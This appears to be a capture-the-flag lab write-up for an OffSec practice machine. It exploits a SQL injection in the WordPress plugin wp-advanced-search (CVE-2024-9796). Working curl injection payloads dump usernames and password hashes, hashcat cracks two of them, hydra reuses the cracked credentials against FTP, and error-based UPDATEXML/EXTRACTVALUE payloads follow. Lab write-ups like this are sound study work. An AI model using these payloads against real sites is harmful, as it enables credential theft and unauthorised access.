InfoSec LAB

workaholic_SQLi

Created: 3 min read

SQLi

An SQL injection vulnerability has been identified in the target WordPress instance due to the use of an outdated plugin, wp-advanced-search 3.3.8, leading to an authentication SQL injection; CVE-2024-9796

PoC has been provided in the official disclosure of the vulnerability. Confirmed.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f="f--&t=t&e=e&q=q') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
Erreur : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"f-- FROM t WHERE "f-- LIKE '%q%' ORDER BY "f-- ASC, idindex DESC' at line 1
real	0.06s
user	0.01s
sys	0.00s
cpu	12%

After several trials and errors, it has been discovered that

  • q parameter gets fed into the LIKE statement
  • f parameter is to the SELECT, WHERE, and ORDER BY statements
  • t parameter is to the FROM statement
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'q=blahblah&f=user_login&t=wp_users--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
admin
charlie
ted
 
real	0.08s
user	0.01s
sys	0.00s
cpu	11%
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'q=blahblah&f=user_pass&t=wp_users--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli"
$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/
 
real	0.08s
user	0.00s
sys	0.00s
cpu	11%

Exfiltrating the username and password hashes from the wp_users table.

  • admin:$P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn.
  • charlie:$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.
  • ted:$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/

Password Cracking

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hashcat -a 0 -m 400 .\hashes.txt .\rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 3 digests; 3 unique digests, 3 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
$P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/:okadamat17
$P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p.:chrish20
Approaching final keyspace - workload adjusted.
 
 
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 400 (phpass)
Hash.Target......: .\hashes.txt
Time.Started.....: Fri Jun 27 17:04:30 2025 (37 secs)
Time.Estimated...: Fri Jun 27 17:05:07 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   782.8 kH/s (0.58ms) @ Accel:256 Loops:64 Thr:128 Vec:1
Speed.#3.........:    34393 H/s (6.71ms) @ Accel:16 Loops:128 Thr:64 Vec:1
Speed.#*.........:   817.2 kH/s
Recovered........: 2/3 (66.67%) Digests (total), 2/3 (66.67%) Digests (new), 2/3 (66.67%) Salts
Progress.........: 43033155/43033155 (100.00%)
Rejected.........: 0/43033155 (0.00%)
Restore.Point....: 14259057/14344385 (99.41%)
Restore.Sub.#1...: Salt:2 Amplifier:0-1 Iteration:8128-8192
Restore.Sub.#3...: Salt:2 Amplifier:0-1 Iteration:8064-8192
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[284b29616c616d696572646138284b29] -> $HEX[042a0337c2a156616d6f732103]
Candidates.#3....: 0122665023 -> 008850
Hardware.Mon.#1..: Temp: 66c Util:  0% Core:1222MHz Mem:6000MHz Bus:8
Hardware.Mon.#3..: N/A
 
Started: Fri Jun 27 17:04:00 2025
Stopped: Fri Jun 27 17:05:10 2025

Password hashes cracked for the charie and ted users;

  • charlie:chrish20
  • ted:okadamat17

Credential Reuse

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ hydra -L ./users.txt -P ./passwords.txt -I -t 64 ftp://$IP                                          
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-27 17:09:03
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:3/p:2), ~1 try per task
[DATA] attacking ftp://192.168.136.229:21/
[21][ftp] host: 192.168.136.229   login: ted   password: okadamat17
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-06-27 17:09:06

The credential of the ted user is reused for the target FTP server.

Error-based In-band

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=UPDATEXML(1337,CONCAT(version()),31337)--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"        
Erreur : XPATH syntax error: '.41-0ubuntu0.24.04.1'
real	0.07s
user	0.01s
sys	0.00s
cpu	11%

Using UPDATEXML method.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=EXTRACTVALUE(1337,CONCAT(0x11,database()))--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"      
Erreur : XPATH syntax error: 'wordpress'
real	0.06s
user	0.01s
sys	0.00s
cpu	14%

Using the EXTRACTVALUE method. The current database is wordpress

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/workaholic]
└─$ sqli=$(echo 'f=EXTRACTVALUE(1337,CONCAT(0x11,current_user()))--') ; time curl -s "http://workaholic.offsec//wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?$sqli&q=q"   
Erreur : XPATH syntax error: 'wpadmin@localhost'
real	0.06s
user	0.01s
sys	0.00s
cpu	13%

Using the EXTRACTVALUE method. The current database is wpadmin

Cannot progress the rest

Interactive Graph View

Backlinks